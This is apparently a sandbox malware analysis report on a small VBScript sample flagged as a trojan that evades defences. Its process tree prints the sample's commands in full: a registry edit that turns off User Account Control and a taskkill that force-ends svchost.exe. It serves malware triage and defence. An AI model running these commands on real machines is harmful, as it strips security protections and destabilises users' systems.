Overview

overview

10

Static

static

1

vbs.vbs

windows7-x64

10

vbs.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    131s
  • max time network
    27s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    15-04-2024 23:47

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    vbs.vbs

  • Size

    1KB

  • MD5

    239bbcf5668cd4778530d27aa4a50d3a

  • SHA1

    694809c0a1c739bc85d9790460153caff768b71f

  • SHA256

    dd37c75a0da7c3be6f4dc3594cf7bd3460200593664a5344eb0c9120ef61d86f

  • SHA512

    08f1f2437286743964142fafe6db8c62e02e2cfbdeb5b9842a1f555bc00cb615b8fc98dc355067045a20afbbc3d60b09c61018ead2407105cce2e9c877440057

Score
10/10
evasiontrojan

Malware Config

Signatures

  • UAC bypass 3 TTPs 2 IoCs
    evasiontrojan
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vbs.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1392
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2036
      • C:\Windows\System32\reg.exe
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • UAC bypass
        • Modifies registry key
        PID:3028
    • C:\Windows\System32\reg.exe
      "C:\Windows\System32\reg.exe" DELETE "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v ABC_DEF /f
      2⤵
        PID:2156
      • C:\Windows\System32\wscript.exe
        "C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\vbs.vbs" uac
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1228
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /k C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2512
          • C:\Windows\System32\reg.exe
            C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
            4⤵
            • UAC bypass
            • Modifies registry key
            PID:2644
        • C:\Windows\System32\reg.exe
          "C:\Windows\System32\reg.exe" DELETE "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v ABC_DEF /f
          3⤵
            PID:2616
          • C:\Windows\System32\taskkill.exe
            "C:\Windows\System32\taskkill.exe" /f /im svchost.exe
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2880
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        1⤵
          PID:2608
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs
          1⤵
            PID:2656
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs
            1⤵
              PID:2764
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
              1⤵
                PID:2776
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs
                1⤵
                  PID:2856
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs
                  1⤵
                    PID:752

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads